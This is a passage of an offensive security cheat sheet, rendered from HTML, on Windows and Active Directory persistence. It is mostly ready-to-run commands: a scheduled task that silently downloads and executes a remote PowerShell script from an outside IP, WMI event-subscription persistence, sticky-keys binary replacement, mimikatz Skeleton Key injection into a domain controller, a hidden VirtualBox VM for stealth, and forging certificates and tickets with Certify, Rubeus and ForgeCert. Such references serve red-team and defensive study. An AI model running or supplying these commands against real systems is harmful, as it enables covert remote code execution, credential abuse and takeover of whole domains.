<a id="__codelineno-29-32" name="__codelineno-29-32" href="#__codelineno-29-32"></a><span class="n">schtasks</span> <span class="p">/</span><span class="n">create</span> <span class="p">/</span><span class="n">tn</span> <span class="n">OfficeUpdaterC</span> <span class="p">/</span><span class="n">tr</span> <span class="s2">&quot;c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c &#39;IEX ((new-object net.webclient).downloadstring(&#39;&#39;http://192.168.95.195:8080/kBBldxiub6&#39;&#39;&#39;))&#39;&quot;</span> <span class="p">/</span><span class="nb">sc </span><span class="n">onidle</span> <span class="p">/</span><span class="n">i</span> <span class="n">30</span>
</code></pre></div>
<h3 id="windows-management-instrumentation-event-subscription">Windows Management Instrumentation Event Subscription</h3>
<blockquote>
<p>An adversary can use Windows Management Instrumentation (WMI) to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.</p>
</blockquote>
<ul>
<li><strong>__EventFilter</strong>: Trigger (new process, failed logon etc.)</li>
<li><strong>EventConsumer</strong>: Perform Action (execute payload etc.)</li>
<li><strong>__FilterToConsumerBinding</strong>: Binds Filter and Consumer Classes</li>
</ul>
<div class="highlight"><pre><span></span><code><a id="__codelineno-30-1" name="__codelineno-30-1" href="#__codelineno-30-1"></a><span class="c"># Using CMD : Execute a binary 60 seconds after Windows started</span>
<a id="__codelineno-30-2" name="__codelineno-30-2" href="#__codelineno-30-2"></a><span class="n">wmic</span> <span class="p">/</span><span class="n">NAMESPACE</span><span class="p">:</span><span class="s2">&quot;\\root\subscription&quot;</span> <span class="n">PATH</span> <span class="n">__EventFilter</span> <span class="n">CREATE</span> <span class="n">Name</span><span class="p">=</span><span class="s2">&quot;WMIPersist&quot;</span><span class="p">,</span> <span class="n">EventNameSpace</span><span class="p">=</span><span class="s2">&quot;root\cimv2&quot;</span><span class="p">,</span><span class="n">QueryLanguage</span><span class="p">=</span><span class="s2">&quot;WQL&quot;</span><span class="p">,</span> <span class="n">Query</span><span class="p">=</span><span class="s2">&quot;SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA &#39;Win32_PerfFormattedData_PerfOS_System&#39;&quot;</span>
<a id="__codelineno-30-3" name="__codelineno-30-3" href="#__codelineno-30-3"></a><span class="n">wmic</span> <span class="p">/</span><span class="n">NAMESPACE</span><span class="p">:</span><span class="s2">&quot;\\root\subscription&quot;</span> <span class="n">PATH</span> <span class="n">CommandLineEventConsumer</span> <span class="n">CREATE</span> <span class="n">Name</span><span class="p">=</span><span class="s2">&quot;WMIPersist&quot;</span><span class="p">,</span> <span class="n">ExecutablePath</span><span class="p">=</span><span class="s2">&quot;C:\Windows\System32\binary.exe&quot;</span><span class="p">,</span><span class="n">CommandLineTemplate</span><span class="p">=</span><span class="s2">&quot;C:\Windows\System32\binary.exe&quot;</span>
<a id="__codelineno-30-4" name="__codelineno-30-4" href="#__codelineno-30-4"></a><span class="n">wmic</span> <span class="p">/</span><span class="n">NAMESPACE</span><span class="p">:</span><span class="s2">&quot;\\root\subscription&quot;</span> <span class="n">PATH</span> <span class="n">__FilterToConsumerBinding</span> <span class="n">CREATE</span> <span class="k">Filter</span><span class="p">=</span><span class="s2">&quot;__EventFilter.Name=\&quot;</span><span class="n">WMIPersist</span><span class="p">\</span><span class="s2">&quot;&quot;</span><span class="p">,</span> <span class="n">Consumer</span><span class="p">=</span><span class="s2">&quot;CommandLineEventConsumer.Name=\&quot;</span><span class="n">WMIPersist</span><span class="p">\</span><span class="s2">&quot;&quot;</span>
<a id="__codelineno-30-5" name="__codelineno-30-5" href="#__codelineno-30-5"></a><span class="c"># Remove it</span>
<a id="__codelineno-30-6" name="__codelineno-30-6" href="#__codelineno-30-6"></a><span class="nb">Get-WMIObject</span> <span class="n">-Namespace</span> <span class="n">root</span><span class="p">\</span><span class="n">Subscription</span> <span class="n">-Class</span> <span class="n">__EventFilter</span> <span class="n">-Filter</span> <span class="s2">&quot;Name=&#39;WMIPersist&#39;&quot;</span> <span class="p">|</span> <span class="nb">Remove-WmiObject</span> <span class="n">-Verbose</span>
<a id="__codelineno-30-7" name="__codelineno-30-7" href="#__codelineno-30-7"></a>
<a id="__codelineno-30-8" name="__codelineno-30-8" href="#__codelineno-30-8"></a><span class="c"># Using Powershell (deploy)</span>
<a id="__codelineno-30-9" name="__codelineno-30-9" href="#__codelineno-30-9"></a><span class="nv">$FilterArgs</span> <span class="p">=</span> <span class="p">@{</span><span class="n">name</span><span class="p">=</span><span class="s1">&#39;WMIPersist&#39;</span><span class="p">;</span> <span class="n">EventNameSpace</span><span class="p">=</span><span class="s1">&#39;root\CimV2&#39;</span><span class="p">;</span> <span class="n">QueryLanguage</span><span class="p">=</span><span class="s2">&quot;WQL&quot;</span><span class="p">;</span> <span class="n">Query</span><span class="p">=</span><span class="s2">&quot;SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA &#39;Win32_PerfFormattedData_PerfOS_System&#39; AND TargetInstance.SystemUpTime &gt;= 60 AND TargetInstance.SystemUpTime &lt; 90&quot;</span><span class="p">};</span>
<a id="__codelineno-30-10" name="__codelineno-30-10" href="#__codelineno-30-10"></a><span class="nv">$Filter</span><span class="p">=</span><span class="nb">New-CimInstance</span> <span class="n">-Namespace</span> <span class="n">root</span><span class="p">/</span><span class="n">subscription</span> <span class="n">-ClassName</span> <span class="n">__EventFilter</span> <span class="n">-Property</span> <span class="nv">$FilterArgs</span>
<a id="__codelineno-30-11" name="__codelineno-30-11" href="#__codelineno-30-11"></a><span class="nv">$ConsumerArgs</span> <span class="p">=</span> <span class="p">@{</span><span class="n">name</span><span class="p">=</span><span class="s1">&#39;WMIPersist&#39;</span><span class="p">;</span> <span class="n">CommandLineTemplate</span><span class="p">=</span><span class="s2">&quot;</span><span class="p">$(</span><span class="nv">$Env:SystemRoot</span><span class="p">)</span><span class="s2">\System32\binary.exe&quot;</span><span class="p">;}</span>
<a id="__codelineno-30-12" name="__codelineno-30-12" href="#__codelineno-30-12"></a><span class="nv">$Consumer</span><span class="p">=</span><span class="nb">New-CimInstance</span> <span class="n">-Namespace</span> <span class="n">root</span><span class="p">/</span><span class="n">subscription</span> <span class="n">-ClassName</span> <span class="n">CommandLineEventConsumer</span> <span class="n">-Property</span> <span class="nv">$ConsumerArgs</span>
<a id="__codelineno-30-13" name="__codelineno-30-13" href="#__codelineno-30-13"></a><span class="nv">$FilterToConsumerArgs</span> <span class="p">=</span> <span class="p">@{</span><span class="k">Filter</span> <span class="p">=</span> <span class="no">[Ref]</span> <span class="nv">$Filter</span><span class="p">;</span> <span class="n">Consumer</span> <span class="p">=</span> <span class="no">[Ref]</span> <span class="nv">$Consumer</span><span class="p">;}</span>
<a id="__codelineno-30-14" name="__codelineno-30-14" href="#__codelineno-30-14"></a><span class="nv">$FilterToConsumerBinding</span> <span class="p">=</span> <span class="nb">New-CimInstance</span> <span class="n">-Namespace</span> <span class="n">root</span><span class="p">/</span><span class="n">subscription</span> <span class="n">-ClassName</span> <span class="n">__FilterToConsumerBinding</span> <span class="n">-Property</span> <span class="nv">$FilterToConsumerArgs</span>
<a id="__codelineno-30-15" name="__codelineno-30-15" href="#__codelineno-30-15"></a><span class="c"># Using Powershell (remove)</span>
<a id="__codelineno-30-16" name="__codelineno-30-16" href="#__codelineno-30-16"></a><span class="nv">$EventConsumerToCleanup</span> <span class="p">=</span> <span class="nb">Get-WmiObject</span> <span class="n">-Namespace</span> <span class="n">root</span><span class="p">/</span><span class="n">subscription</span> <span class="n">-Class</span> <span class="n">CommandLineEventConsumer</span> <span class="n">-Filter</span> <span class="s2">&quot;Name = &#39;WMIPersist&#39;&quot;</span>
<a id="__codelineno-30-17" name="__codelineno-30-17" href="#__codelineno-30-17"></a><span class="nv">$EventFilterToCleanup</span> <span class="p">=</span> <span class="nb">Get-WmiObject</span> <span class="n">-Namespace</span> <span class="n">root</span><span class="p">/</span><span class="n">subscription</span> <span class="n">-Class</span> <span class="n">__EventFilter</span> <span class="n">-Filter</span> <span class="s2">&quot;Name = &#39;WMIPersist&#39;&quot;</span>
<a id="__codelineno-30-18" name="__codelineno-30-18" href="#__codelineno-30-18"></a><span class="nv">$FilterConsumerBindingToCleanup</span> <span class="p">=</span> <span class="nb">Get-WmiObject</span> <span class="n">-Namespace</span> <span class="n">root</span><span class="p">/</span><span class="n">subscription</span> <span class="n">-Query</span> <span class="s2">&quot;REFERENCES OF {</span><span class="p">$(</span><span class="nv">$EventConsumerToCleanup</span><span class="p">.</span><span class="n">__RELPATH</span><span class="p">)</span><span class="s2">} WHERE ResultClass = __FilterToConsumerBinding&quot;</span>
<a id="__codelineno-30-19" name="__codelineno-30-19" href="#__codelineno-30-19"></a><span class="nv">$FilterConsumerBindingToCleanup</span> <span class="p">|</span> <span class="nb">Remove-WmiObject</span>
<a id="__codelineno-30-20" name="__codelineno-30-20" href="#__codelineno-30-20"></a><span class="nv">$EventConsumerToCleanup</span> <span class="p">|</span> <span class="nb">Remove-WmiObject</span>
<a id="__codelineno-30-21" name="__codelineno-30-21" href="#__codelineno-30-21"></a><span class="nv">$EventFilterToCleanup</span> <span class="p">|</span> <span class="nb">Remove-WmiObject</span>
</code></pre></div>
<h3 id="binary-replacement">Binary Replacement</h3>
<h4 id="binary-replacement-on-windows-xp">Binary Replacement on Windows XP+</h4>
<table>
<thead>
<tr>
<th>Feature</th>
<th>Executable</th>
</tr>
</thead>
<tbody>
<tr>
<td>Sticky Keys</td>
<td>C:\Windows\System32\sethc.exe</td>
</tr>
<tr>
<td>Accessibility Menu</td>
<td>C:\Windows\System32\utilman.exe</td>
</tr>
<tr>
<td>On-Screen Keyboard</td>
<td>C:\Windows\System32\osk.exe</td>
</tr>
<tr>
<td>Magnifier</td>
<td>C:\Windows\System32\Magnify.exe</td>
</tr>
<tr>
<td>Narrator</td>
<td>C:\Windows\System32\Narrator.exe</td>
</tr>
<tr>
<td>Display Switcher</td>
<td>C:\Windows\System32\DisplaySwitch.exe</td>
</tr>
<tr>
<td>App Switcher</td>
<td>C:\Windows\System32\AtBroker.exe</td>
</tr>
</tbody>
</table>
<p>In Metasploit : <code>use post/windows/manage/sticky_keys</code></p>
<h4 id="binary-replacement-on-windows-10">Binary Replacement on Windows 10+</h4>
<p>Exploit a DLL hijacking vulnerability in the On-Screen Keyboard <strong>osk.exe</strong> executable.</p>
<p>Create a malicious <strong>HID.dll</strong> in <code>C:\Program Files\Common Files\microsoft shared\ink\HID.dll</code>.</p>
<h3 id="skeleton-key">Skeleton Key</h3>
<blockquote>
<p>Inject a master password into the LSASS process of a Domain Controller.</p>
</blockquote>
<p>Requirements:
* Domain Administrator (SeDebugPrivilege) or <code>NTAUTHORITY\SYSTEM</code></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-31-1" name="__codelineno-31-1" href="#__codelineno-31-1"></a><span class="c"># Execute the skeleton key attack</span>
<a id="__codelineno-31-2" name="__codelineno-31-2" href="#__codelineno-31-2"></a><span class="n">mimikatz</span> <span class="s2">&quot;privilege::debug&quot;</span> <span class="s2">&quot;misc::skeleton&quot;</span>
<a id="__codelineno-31-3" name="__codelineno-31-3" href="#__codelineno-31-3"></a><span class="nb">Invoke-Mimikatz</span> <span class="n">-Command</span> <span class="s1">&#39;&quot;privilege::debug&quot; &quot;misc::skeleton&quot;&#39;</span> <span class="n">-ComputerName</span> <span class="p">&lt;</span><span class="n">DCs</span> <span class="n">FQDN</span><span class="p">&gt;</span>
<a id="__codelineno-31-4" name="__codelineno-31-4" href="#__codelineno-31-4"></a>
<a id="__codelineno-31-5" name="__codelineno-31-5" href="#__codelineno-31-5"></a><span class="c"># Access using the password &quot;mimikatz&quot;</span>
<a id="__codelineno-31-6" name="__codelineno-31-6" href="#__codelineno-31-6"></a><span class="nb">Enter-PSSession</span> <span class="n">-ComputerName</span> <span class="p">&lt;</span><span class="n">AnyMachineYouLike</span><span class="p">&gt;</span> <span class="n">-Credential</span> <span class="p">&lt;</span><span class="n">Domain</span><span class="p">&gt;\</span><span class="n">Administrator</span>
</code></pre></div>
<h3 id="virtual-machines">Virtual Machines</h3>
<blockquote>
<p>Based on the Shadow Bunny technique.</p>
</blockquote>
<div class="highlight"><pre><span></span><code><a id="__codelineno-32-1" name="__codelineno-32-1" href="#__codelineno-32-1"></a><span class="c"># download virtualbox</span>
<a id="__codelineno-32-2" name="__codelineno-32-2" href="#__codelineno-32-2"></a><span class="nb">Invoke-WebRequest</span> <span class="s2">&quot;https://download.virtualbox.org/virtualbox/6.1.8/VirtualBox-6.1.8-137981-Win.exe&quot;</span> <span class="n">-OutFile</span> <span class="nv">$env:TEMP</span><span class="p">\</span><span class="n">VirtualBox</span><span class="p">-</span><span class="n">6</span><span class="p">.</span><span class="n">1</span><span class="p">.</span><span class="n">8</span><span class="p">-</span><span class="n">137981-Win</span><span class="p">.</span><span class="n">exe</span>
<a id="__codelineno-32-3" name="__codelineno-32-3" href="#__codelineno-32-3"></a>
<a id="__codelineno-32-4" name="__codelineno-32-4" href="#__codelineno-32-4"></a><span class="c"># perform a silent install and avoid creating desktop and quick launch icons</span>
<a id="__codelineno-32-5" name="__codelineno-32-5" href="#__codelineno-32-5"></a><span class="n">VirtualBox</span><span class="p">-</span><span class="n">6</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">14</span><span class="p">-</span><span class="n">133895-Win</span><span class="p">.</span><span class="n">exe</span> <span class="p">-</span><span class="n">-silent</span> <span class="p">-</span><span class="n">-ignore-reboot</span> <span class="p">-</span><span class="n">-msiparams</span> <span class="n">VBOX_INSTALLDESKTOPSHORTCUT</span><span class="p">=</span><span class="n">0</span><span class="p">,</span><span class="n">VBOX_INSTALLQUICKLAUNCHSHORTCUT</span><span class="p">=</span><span class="n">0</span>
<a id="__codelineno-32-6" name="__codelineno-32-6" href="#__codelineno-32-6"></a>
<a id="__codelineno-32-7" name="__codelineno-32-7" href="#__codelineno-32-7"></a><span class="c"># in \Program Files\Oracle\VirtualBox\VBoxManage.exe</span>
<a id="__codelineno-32-8" name="__codelineno-32-8" href="#__codelineno-32-8"></a><span class="c"># Disabling notifications</span>
<a id="__codelineno-32-9" name="__codelineno-32-9" href="#__codelineno-32-9"></a><span class="p">.\</span><span class="n">VBoxManage</span><span class="p">.</span><span class="n">exe</span> <span class="n">setextradata</span> <span class="n">global</span> <span class="n">GUI</span><span class="p">/</span><span class="n">SuppressMessages</span> <span class="s2">&quot;all&quot;</span>
<a id="__codelineno-32-10" name="__codelineno-32-10" href="#__codelineno-32-10"></a>
<a id="__codelineno-32-11" name="__codelineno-32-11" href="#__codelineno-32-11"></a><span class="c"># Download the Virtual machine disk</span>
<a id="__codelineno-32-12" name="__codelineno-32-12" href="#__codelineno-32-12"></a><span class="nb">Copy-Item</span> <span class="p">\\</span><span class="n">smbserver</span><span class="p">\</span><span class="n">images</span><span class="p">\</span><span class="n">shadowbunny</span><span class="p">.</span><span class="n">vhd</span> <span class="nv">$env:USERPROFILE</span><span class="p">\</span><span class="n">VirtualBox</span><span class="p">\</span><span class="n">IT</span> <span class="n">Recovery</span><span class="p">\</span><span class="n">shadowbunny</span><span class="p">.</span><span class="n">vhd</span>
<a id="__codelineno-32-13" name="__codelineno-32-13" href="#__codelineno-32-13"></a>
<a id="__codelineno-32-14" name="__codelineno-32-14" href="#__codelineno-32-14"></a><span class="c"># Create a new VM</span>
<a id="__codelineno-32-15" name="__codelineno-32-15" href="#__codelineno-32-15"></a><span class="nv">$vmname</span> <span class="p">=</span> <span class="s2">&quot;IT Recovery&quot;</span>
<a id="__codelineno-32-16" name="__codelineno-32-16" href="#__codelineno-32-16"></a><span class="p">.\</span><span class="n">VBoxManage</span><span class="p">.</span><span class="n">exe</span> <span class="n">createvm</span> <span class="p">-</span><span class="n">-name</span> <span class="nv">$vmname</span> <span class="p">-</span><span class="n">-ostype</span> <span class="s2">&quot;Ubuntu&quot;</span> <span class="p">-</span><span class="n">-register</span>
<a id="__codelineno-32-17" name="__codelineno-32-17" href="#__codelineno-32-17"></a>
<a id="__codelineno-32-18" name="__codelineno-32-18" href="#__codelineno-32-18"></a><span class="c"># Add a network card in NAT mode</span>
<a id="__codelineno-32-19" name="__codelineno-32-19" href="#__codelineno-32-19"></a><span class="p">.\</span><span class="n">VBoxManage</span><span class="p">.</span><span class="n">exe</span> <span class="n">modifyvm</span> <span class="nv">$vmname</span> <span class="p">-</span><span class="n">-ioapic</span> <span class="n">on</span> <span class="c"># required for 64bit</span>
<a id="__codelineno-32-20" name="__codelineno-32-20" href="#__codelineno-32-20"></a><span class="p">.\</span><span class="n">VBoxManage</span><span class="p">.</span><span class="n">exe</span> <span class="n">modifyvm</span> <span class="nv">$vmname</span> <span class="p">-</span><span class="n">-memory</span> <span class="n">1024</span> <span class="p">-</span><span class="n">-vram</span> <span class="n">128</span>
<a id="__codelineno-32-21" name="__codelineno-32-21" href="#__codelineno-32-21"></a><span class="p">.\</span><span class="n">VBoxManage</span><span class="p">.</span><span class="n">exe</span> <span class="n">modifyvm</span> <span class="nv">$vmname</span> <span class="p">-</span><span class="n">-nic1</span> <span class="n">nat</span>
<a id="__codelineno-32-22" name="__codelineno-32-22" href="#__codelineno-32-22"></a><span class="p">.\</span><span class="n">VBoxManage</span><span class="p">.</span><span class="n">exe</span> <span class="n">modifyvm</span> <span class="nv">$vmname</span> <span class="p">-</span><span class="n">-audio</span> <span class="n">none</span>
<a id="__codelineno-32-23" name="__codelineno-32-23" href="#__codelineno-32-23"></a><span class="p">.\</span><span class="n">VBoxManage</span><span class="p">.</span><span class="n">exe</span> <span class="n">modifyvm</span> <span class="nv">$vmname</span> <span class="p">-</span><span class="n">-graphicscontroller</span> <span class="n">vmsvga</span>
<a id="__codelineno-32-24" name="__codelineno-32-24" href="#__codelineno-32-24"></a><span class="p">.\</span><span class="n">VBoxManage</span><span class="p">.</span><span class="n">exe</span> <span class="n">modifyvm</span> <span class="nv">$vmname</span> <span class="p">-</span><span class="n">-description</span> <span class="s2">&quot;Shadowbunny&quot;</span>
<a id="__codelineno-32-25" name="__codelineno-32-25" href="#__codelineno-32-25"></a>
<a id="__codelineno-32-26" name="__codelineno-32-26" href="#__codelineno-32-26"></a><span class="c"># Mount the VHD file</span>
<a id="__codelineno-32-27" name="__codelineno-32-27" href="#__codelineno-32-27"></a><span class="p">.\</span><span class="n">VBoxManage</span><span class="p">.</span><span class="n">exe</span> <span class="n">storagectl</span> <span class="nv">$vmname</span> <span class="n">-name</span> <span class="s2">&quot;SATA Controller&quot;</span> <span class="n">-add</span> <span class="n">sata</span>
<a id="__codelineno-32-28" name="__codelineno-32-28" href="#__codelineno-32-28"></a><span class="p">.\</span><span class="n">VBoxManage</span><span class="p">.</span><span class="n">exe</span> <span class="n">storageattach</span> <span class="nv">$vmname</span> <span class="n">-comment</span> <span class="s2">&quot;Shadowbunny Disk&quot;</span> <span class="n">-storagectl</span> <span class="s2">&quot;SATA Controller&quot;</span> <span class="n">-type</span> <span class="n">hdd</span> <span class="n">-medium</span> <span class="s2">&quot;$env:USERPROFILE\VirtualBox VMs\IT Recovery\shadowbunny.vhd&quot;</span> <span class="n">-port</span> <span class="n">0</span>
<a id="__codelineno-32-29" name="__codelineno-32-29" href="#__codelineno-32-29"></a>
<a id="__codelineno-32-30" name="__codelineno-32-30" href="#__codelineno-32-30"></a><span class="c"># Start the VM</span>
<a id="__codelineno-32-31" name="__codelineno-32-31" href="#__codelineno-32-31"></a><span class="p">.\</span><span class="n">VBoxManage</span><span class="p">.</span><span class="n">exe</span> <span class="n">startvm</span> <span class="nv">$vmname</span> <span class="err"></span><span class="nb">type </span><span class="n">headless</span>
<a id="__codelineno-32-32" name="__codelineno-32-32" href="#__codelineno-32-32"></a>
<a id="__codelineno-32-33" name="__codelineno-32-33" href="#__codelineno-32-33"></a>
<a id="__codelineno-32-34" name="__codelineno-32-34" href="#__codelineno-32-34"></a><span class="c"># optional - adding a shared folder</span>
<a id="__codelineno-32-35" name="__codelineno-32-35" href="#__codelineno-32-35"></a><span class="c"># require: VirtualBox Guest Additions</span>
<a id="__codelineno-32-36" name="__codelineno-32-36" href="#__codelineno-32-36"></a><span class="p">.\</span><span class="n">VBoxManage</span><span class="p">.</span><span class="n">exe</span> <span class="n">sharedfolder</span> <span class="n">add</span> <span class="nv">$vmname</span> <span class="n">-name</span> <span class="n">shadow_c</span> <span class="n">-hostpath</span> <span class="n">c</span><span class="p">:\</span> <span class="n">-automount</span>
<a id="__codelineno-32-37" name="__codelineno-32-37" href="#__codelineno-32-37"></a><span class="c"># then mount the folder in the VM</span>
<a id="__codelineno-32-38" name="__codelineno-32-38" href="#__codelineno-32-38"></a><span class="n">sudo</span> <span class="n">mkdir</span> <span class="p">/</span><span class="n">mnt</span><span class="p">/</span><span class="n">c</span>
<a id="__codelineno-32-39" name="__codelineno-32-39" href="#__codelineno-32-39"></a><span class="n">sudo</span> <span class="nb">mount </span><span class="n">-t</span> <span class="n">vboxsf</span> <span class="n">shadow_c</span> <span class="p">/</span><span class="n">mnt</span><span class="p">/</span><span class="n">c</span>
</code></pre></div>
<h3 id="windows-subsystem-for-linux">Windows Subsystem for Linux</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-33-1" name="__codelineno-33-1" href="#__codelineno-33-1"></a><span class="c"># List and install online packages</span>
<a id="__codelineno-33-2" name="__codelineno-33-2" href="#__codelineno-33-2"></a><span class="n">wsl</span> <span class="p">-</span><span class="n">-list</span> <span class="p">-</span><span class="n">-online</span>
<a id="__codelineno-33-3" name="__codelineno-33-3" href="#__codelineno-33-3"></a><span class="n">wsl</span> <span class="p">-</span><span class="n">-install</span> <span class="n">-d</span> <span class="n">kali-linux</span>
<a id="__codelineno-33-4" name="__codelineno-33-4" href="#__codelineno-33-4"></a>
<a id="__codelineno-33-5" name="__codelineno-33-5" href="#__codelineno-33-5"></a><span class="c"># Use a local package</span>
<a id="__codelineno-33-6" name="__codelineno-33-6" href="#__codelineno-33-6"></a><span class="n">wsl</span> <span class="p">-</span><span class="n">-set-default-version</span> <span class="n">2</span>
<a id="__codelineno-33-7" name="__codelineno-33-7" href="#__codelineno-33-7"></a><span class="n">curl</span><span class="p">.</span><span class="n">exe</span> <span class="p">-</span><span class="n">-insecure</span> <span class="n">-L</span> <span class="n">-o</span> <span class="n">debian</span><span class="p">.</span><span class="n">appx</span> <span class="n">https</span><span class="p">://</span><span class="n">aka</span><span class="p">.</span><span class="n">ms</span><span class="p">/</span><span class="n">wsl-debian-gnulinux</span>
<a id="__codelineno-33-8" name="__codelineno-33-8" href="#__codelineno-33-8"></a><span class="nb">Add-AppxPackage</span> <span class="p">.\</span><span class="n">debian</span><span class="p">.</span><span class="n">appx</span>
<a id="__codelineno-33-9" name="__codelineno-33-9" href="#__codelineno-33-9"></a>
<a id="__codelineno-33-10" name="__codelineno-33-10" href="#__codelineno-33-10"></a><span class="c"># Run the machine as root</span>
<a id="__codelineno-33-11" name="__codelineno-33-11" href="#__codelineno-33-11"></a><span class="n">wsl</span> <span class="n">kali-linux</span> <span class="p">-</span><span class="n">-user</span> <span class="n">root</span>
</code></pre></div>
<h2 id="domain">Domain</h2>
<h3 id="user-certificate">User Certificate</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-34-1" name="__codelineno-34-1" href="#__codelineno-34-1"></a><span class="c"># Request a certificate for the User template</span>
<a id="__codelineno-34-2" name="__codelineno-34-2" href="#__codelineno-34-2"></a><span class="p">.\</span><span class="n">Certify</span><span class="p">.</span><span class="n">exe</span> <span class="n">request</span> <span class="p">/</span><span class="n">ca</span><span class="p">:</span><span class="n">CA01</span><span class="p">.</span><span class="n">megacorp</span><span class="p">.</span><span class="n">local</span><span class="p">\</span><span class="n">CA01</span> <span class="p">/</span><span class="n">template</span><span class="p">:</span><span class="n">User</span>
<a id="__codelineno-34-3" name="__codelineno-34-3" href="#__codelineno-34-3"></a>
<a id="__codelineno-34-4" name="__codelineno-34-4" href="#__codelineno-34-4"></a><span class="c"># Convert the certificate for Rubeus</span>
<a id="__codelineno-34-5" name="__codelineno-34-5" href="#__codelineno-34-5"></a><span class="n">openssl</span> <span class="n">pkcs12</span> <span class="n">-in</span> <span class="n">cert</span><span class="p">.</span><span class="n">pem</span> <span class="n">-keyex</span> <span class="n">-CSP</span> <span class="s2">&quot;Microsoft Enhanced Cryptographic Provider v1.0&quot;</span> <span class="n">-export</span> <span class="n">-out</span> <span class="n">cert</span><span class="p">.</span><span class="n">pfx</span>
<a id="__codelineno-34-6" name="__codelineno-34-6" href="#__codelineno-34-6"></a>
<a id="__codelineno-34-7" name="__codelineno-34-7" href="#__codelineno-34-7"></a><span class="c"># Request a TGT using the certificate</span>
<a id="__codelineno-34-8" name="__codelineno-34-8" href="#__codelineno-34-8"></a><span class="p">.\</span><span class="n">Rubeus</span><span class="p">.</span><span class="n">exe</span> <span class="n">asktgt</span> <span class="p">/</span><span class="n">user</span><span class="p">:</span><span class="n">username</span> <span class="p">/</span><span class="n">certificate</span><span class="p">:</span><span class="n">C</span><span class="p">:\</span><span class="n">Temp</span><span class="p">\</span><span class="n">cert</span><span class="p">.</span><span class="n">pfx</span> <span class="p">/</span><span class="n">password</span><span class="p">:</span><span class="n">Passw0rd123</span><span class="p">!</span>
</code></pre></div>
<h3 id="golden-certificate">Golden Certificate</h3>
<blockquote>
<p>Require elevated privileges in the Active Directory, or on the ADCS machine</p>
</blockquote>
<ul>
<li>Export CA as p12 file: <code>certsrv.msc</code> &gt; <code>Right Click</code> &gt; <code>Back up CA...</code></li>
<li>Alternative 1: Using Mimikatz you can extract the certificate as PFX/DER
<div class="highlight"><pre><span></span><code><a id="__codelineno-35-1" name="__codelineno-35-1" href="#__codelineno-35-1"></a><span class="n">privilege</span><span class="p">::</span><span class="n">debug</span>
<a id="__codelineno-35-2" name="__codelineno-35-2" href="#__codelineno-35-2"></a><span class="n">crypto</span><span class="p">::</span><span class="n">capi</span>
<a id="__codelineno-35-3" name="__codelineno-35-3" href="#__codelineno-35-3"></a><span class="n">crypto</span><span class="p">::</span><span class="n">cng</span>
<a id="__codelineno-35-4" name="__codelineno-35-4" href="#__codelineno-35-4"></a><span class="n">crypto</span><span class="p">::</span><span class="n">certificates</span> <span class="p">/</span><span class="n">systemstore</span><span class="p">:</span><span class="n">local_machine</span> <span class="p">/</span><span class="n">store</span><span class="p">:</span><span class="n">my</span> <span class="p">/</span><span class="n">export</span>
</code></pre></div></li>
<li>Alternative 2: Using SharpDPAPI, then convert the certificate: <code>openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx</code></li>
<li><a href="https://github.com/GhostPack/ForgeCert">ForgeCert</a> - Forge a certificate for any active domain user using the CA certificate
<div class="highlight"><pre><span></span><code><a id="__codelineno-36-1" name="__codelineno-36-1" href="#__codelineno-36-1"></a><span class="n">ForgeCert</span><span class="p">.</span><span class="n">exe</span> <span class="p">-</span><span class="n">-CaCertPath</span> <span class="n">ca</span><span class="p">.</span><span class="n">pfx</span> <span class="p">-</span><span class="n">-CaCertPassword</span> <span class="n">Password123</span> <span class="p">-</span><span class="n">-Subject</span> <span class="n">CN</span><span class="p">=</span><span class="n">User</span> <span class="p">-</span><span class="n">-SubjectAltName</span> <span class="n">harry</span><span class="nv">@lab</span><span class="p">.</span><span class="n">local</span> <span class="p">-</span><span class="n">-NewCertPath</span> <span class="n">harry</span><span class="p">.</span><span class="n">pfx</span> <span class="p">-</span><span class="n">-NewCertPassword</span> <span class="n">Password123</span>
<a id="__codelineno-36-2" name="__codelineno-36-2" href="#__codelineno-36-2"></a><span class="n">ForgeCert</span><span class="p">.</span><span class="n">exe</span> <span class="p">-</span><span class="n">-CaCertPath</span> <span class="n">ca</span><span class="p">.</span><span class="n">pfx</span> <span class="p">-</span><span class="n">-CaCertPassword</span> <span class="n">Password123</span> <span class="p">-</span><span class="n">-Subject</span> <span class="n">CN</span><span class="p">=</span><span class="n">User</span> <span class="p">-</span><span class="n">-SubjectAltName</span> <span class="n">DC</span><span class="p">$</span><span class="nv">@lab</span><span class="p">.</span><span class="n">local</span> <span class="p">-</span><span class="n">-NewCertPath</span> <span class="n">dc</span><span class="p">.</span><span class="n">pfx</span> <span class="p">-</span><span class="n">-NewCertPassword</span> <span class="n">Password123</span>
</code></pre></div></li>
<li>Finally you can request a TGT using the Certificate
<div class="highlight"><pre><span></span><code><a id="__codelineno-37-1" name="__codelineno-37-1" href="#__codelineno-37-1"></a><span class="n">Rubeus</span><span class="p">.</span><span class="n">exe</span> <span class="n">asktgt</span> <span class="p">/</span><span class="n">user</span><span class="p">:</span><span class="n">ron</span> <span class="p">/</span><span class="n">certificate</span><span class="p">:</span><span class="n">harry</span><span class="p">.</span><span class="n">pfx</span> <span class="p">/</span><span class="n">password</span><span class="p">:</span><span class="n">Password123</span>
</code></pre></div></li>
</ul>
<h3 id="golden-ticket">Golden Ticket</h3>
<blockquote>
<p>Forge a Golden ticket using Mimikatz</p>
</blockquote>
<div class="highlight"><pre><span></span><code><a id="__codelineno-38-1" name="__codelineno-38-1" href="#__codelineno-38-1"></a><span class="n">kerberos</span><span class="p">::</span><span class="n">purge</span>
